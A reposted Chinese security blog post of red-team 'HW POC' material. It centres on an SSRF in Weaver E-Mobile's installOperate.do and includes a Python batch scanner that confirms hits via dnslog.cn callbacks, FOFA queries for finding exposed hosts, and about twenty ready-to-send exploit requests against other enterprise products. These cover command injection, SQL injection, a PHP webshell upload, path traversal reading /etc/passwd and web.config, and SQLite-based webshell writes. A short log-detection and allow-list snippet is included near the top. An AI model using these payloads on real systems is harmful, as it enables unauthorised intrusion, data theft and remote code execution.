Weaver E-Mobile installOperate.do SSRF vulnerability | HW POC

admin | 2024-07-28 00:20:17 | 138 views | 12,265 characters | reading time 40 min 53 s
Vulnerability description

The Weaver E-Mobile installOperate.do endpoint contains a server-side request forgery (SSRF) vulnerability. An unauthenticated remote attacker can use it to scan the intranet or local ports of the server hosting the application, obtain service banner information, probe the network layout, and even launch attacks against applications running on the intranet or locally, obtaining sensitive internal server configuration and causing information disclosure.
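As an added, defender-side example (not part of the original post or the batch tool below), the following Python flags installOperate.do requests that carry an svrurl parameter in constructed access-log lines, classifies each target as internal (loopback/private IP) or external, and shows the allow-list check a server-side fix could apply to svrurl; the log lines, hostnames and allow-list are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jul/2024:00:20:17 +0800] "GET /install/installOperate.do?svrurl=http://test.emobile.dnslog.cn HTTP/1.1" 200 312
10.0.0.5 - - [28/Jul/2024:00:20:18 +0800] "GET /install/installOperate.do?svrurl=http://127.0.0.1:8088/ HTTP/1.1" 200 312
10.0.0.7 - - [28/Jul/2024:00:21:02 +0800] "GET /install/installOperate.do?svrurl=http%3A%2F%2F192.168.1.1%3A8088 HTTP/1.1" 200 312
10.0.0.9 - - [28/Jul/2024:00:22:40 +0800] "GET /index.html HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify_target(svrurl):
    """'internal' for loopback/private/link-local IP targets, 'external' for anything else."""
    host = urlsplit(svrurl).hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external"  # a hostname, e.g. an out-of-band DNS callback domain
    return "internal" if (ip.is_loopback or ip.is_private or ip.is_link_local) else "external"

def find_ssrf_attempts(log_text):
    """Flag every request to installOperate.do that carries an svrurl parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["path"])
        if not parts.path.endswith("/install/installOperate.do"):
            continue
        for target in parse_qs(parts.query).get("svrurl", []):  # parse_qs percent-decodes
            hits.append({"src": m["src"], "ts": m["ts"], "svrurl": target,
                         "target": classify_target(target)})
    return hits

def is_allowed_svrurl(svrurl, allowed_hosts):
    """Server-side mitigation: accept svrurl only for an explicitly allow-listed hostname."""
    parts = urlsplit(svrurl)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    return parts.hostname.lower() in {h.lower() for h in allowed_hosts}

if __name__ == "__main__":
    for h in find_ssrf_attempts(SAMPLE_LOG):
        print(f"[{h['target']:8}] {h['src']} {h['ts']} -> {h['svrurl']}")
```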

 

Search syntax

FOFA:

product="泛微-EMobile" || header="EMobileServer"

 

Vulnerability reproduction

GET /install/installOperate.do?svrurl=http://test.emobile.dnslog.cn HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close


 

Batch tool
# encoding:utf-8
import time
import argparse
import ssl
import urllib3
import requests
from urllib3.exceptions import InsecureRequestWarning

# ssl._create_unverified_context: an SSL context that skips server certificate verification on HTTPS requests.
ssl._create_default_https_context = ssl._create_unverified_context
# urllib3.disable_warnings(): suppress the InsecureRequestWarning that unverified HTTPS requests would otherwise print.
urllib3.disable_warnings(InsecureRequestWarning)

# ANSI colours for console output
RED = '\033[31m'
GREEN = '\033[32m'
RESET = '\033[0m'


def check_vuln(url):
    url = url.strip("/")

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
    }
    # Session cookie for dnslog.cn: getrecords.php returns the records of the session that requested the domain.
    headers1 = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
        "Cookie": "PHPSESSID=pgqapiopj5rssr6a2ejvsi69m3; b-user-id=98195658-f7ad-f233-35b2-5f6d469d240d"
    }
    dnslog_url = "http://dnslog.cn/getdomain.php"
    try:
        # Obtain a fresh callback domain, then point svrurl at a subdomain of it.
        getdomain = requests.get(dnslog_url, headers=headers1, verify=False, timeout=15)
        target = url + "/install/installOperate.do?svrurl=http://1.qwe." + getdomain.text
        requests.get(target, headers=headers, verify=False, timeout=15)
        # Poll the DNS records up to three times; a hit means the server resolved the callback domain.
        for i in range(0, 3):
            refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers=headers1, timeout=60)
            time.sleep(1)
            if getdomain.text in refresh.text:
                print(f"{RED}[+] {url} 存在WeaverE-Mobile-installOperate-SSRF漏洞{RESET}")
                return True
        # Only report "not vulnerable" after every poll has missed.
        print(f"{GREEN}[-] {url} 不存在WeaverE-Mobile-installOperate-SSRF漏洞{RESET}")
        return False
    except Exception as e:
        print(f"{GREEN}[-] {url} 请求失败: {e}{RESET}")
        return False


def main():
    parser = argparse.ArgumentParser(description='WeaverE-Mobile-installOperate-SSRF漏洞')
    parser.add_argument('-u', '--url', help='目标URL')
    parser.add_argument('-f', '--file', help='目标URL文件')
    args = parser.parse_args()
    if args.url:
        args.url = "http://" + args.url if not args.url.startswith(('http://', 'https://')) else args.url
        check_vuln(args.url)
    elif args.file:
        with open(args.file, 'r') as f:
            urls = f.read().splitlines()
            for url in urls:
                url = "http://" + url if not url.startswith(('http://', 'https://')) else url
                check_vuln(url)


if __name__ == '__main__':
    main()

 

python .WeaverE-Mobile-installOperate-SSRF.py -f .1.txt
python .WeaverE-Mobile-installOperate-SSRF.py -u 192.168.1.1::8088

HW POC
F-logic DataCube3 command execution vulnerability (CVE-2024-7066)
fofa:title=="DataCube3"
 
POST /admin/config_time_sync.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 116
Content-Type: application/x-www-form-urlencoded
Cookie: SESS_IDS=24ef0vbucnke26mtreijnfumve
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36

accesstime=0.66992700 1710752870&execute=&ntp_enable=&ntp_server=127.0.0.1|id >aaa.txt|&ntp_retry_count=1
 
 
金慧综合管理信息系统 SQL injection vulnerability
POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
  
Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl=
 
Yonyou 时空KSOA PreviewKPQT SQL injection vulnerability
 
fofa: product="用友-时空KSOA"
GET /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
 
 
FanRuan ReportServer SQL injection vulnerability
GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
 
 
金和 OA C6 GeneralXmlhttpPage.aspx SQL injection vulnerability
 
GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/?id=%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1
 
 
百易云资产管理运营系统 arbitrary file upload
POST /comfileup.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=--------1110146050
  
----------1110146050
Content-Disposition: form-data; name="file";filename="rce.php"
  
<?php system("whoami");unlink(__FILE__);?>
----------1110146050--
 
 
联软安渡 UniNXG secure data exchange system SQL injection vulnerability
 
UniExServices/link/queryLinklnfo?address=';SELECT PG_SLEEP(5)--
 
天问物业ERP系统 ContractDownLoad arbitrary file read vulnerability
/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config
 
 
天问物业ERP系统 AreaAvatarDownLoad arbitrary file read vulnerability
/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config
 
 
Yonyou NC UserAuthenticationServlet deserialization vulnerability
POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 114

{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"1ksla7e.dnslog.cn\"}}}"}
 
 
Yonyou U8Cloud ActionServlet SQL injection
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
 
 
Hikvision integrated security management platform detection endpoint pre-auth remote command execution
 
POST /center/api/installation/detection HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=UTF-8
  
{"type":"environment","operate":"","machines":{"id":  "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}
 
 
Bazarr swaggerui component directory traversal leading to arbitrary file read
GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
 
 
H3C Workspace cloud desktop remote command execution vulnerability
fofa:"H3C Workspace"
 
/webui/?g=aaa_portal_auth_adv_submit&tab_name=广告模板&welcome_word=广告模板&btn_color=337ab7&suffix=%7Burlenc(%60id+%3E/usr/local/webui/test.txt%60)%7D&bkg_flag=0&check_btn_color=&des=undefined
 
 
1Panel remote code execution vulnerability
 
GET /.git/config HTTP/1.1
Host: 
User-Agent: test',"test", "test", "", "YmxvZy5tbzYwLmNu", "test", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/test/index/test.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();');#
Connection: close
 
Landray EKP remote code execution vulnerability
/ekp/sys/ui/sys_ui_component/sysUiComponent.do?method=replaceExtend&extendId=../../../../resource/help/km/review/&folderName=../../../ekp/sys/common
 
 
Weaver e-cology9 /services/WorkPlanService pre-auth SQL injection
POST /services/WorkPlanService HTTP/1.1
Host: 
Content-Length: 380
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/120.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Referer: http://0.0.0.0/services/WorkPlanService
Cookie: ecology_JSessionid=bibwzto5sdeg43J9Fz0iu
Connection: close

<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:deleteWorkPlan>
<!--type: string-->
<web:in0>(SELECT 123 FROM
(SELECT(SLEEP(3-(IF(1=1,0,5)))))NZeo)</web:in0>
<!--type: int-->
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>
 
 
Weaver E-Mobile installOperate.do SSRF vulnerability
 
FOFA:header="EMobileServer"
 
GET /install/installOperate.do?svrurl=http://dnslog.cn HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
 
ESAFENET electronic document security management system NoticeAjax endpoint SQL injection vulnerability
 
fofa: app="亿赛通-DLP"
 
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host: x.x.x.x:8443
Cookie: JSESSIONID=A7058CC5796E5F433F2CC668C7B7B77D; JSESSIONID=0E09F2450421C51339E5657425612536
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded

command=delNotice&noticeId=111';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
 
 
ESAFENET electronic document security management system NetSecConfigAjax endpoint SQL injection vulnerability
 
fofa: app="亿赛通-DLP"
 
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host: x.x.x.x
Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917; JSESSIONID=06DCD58EDC037F785605A29CD7425C66
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

command=updateNetSec&state=*

 


 

Originally published on the WeChat public account 扫地僧的茶饭日常: 【漏洞复现】泛微E-Mobile installOperate.do SSRF漏洞 | HW POC

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site accepts none. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
Published by admin on 2024-07-28 00:20:17. When reprinting, keep the original link (CN-SEC 中文网): https://cn-sec.com/archives/3006038.html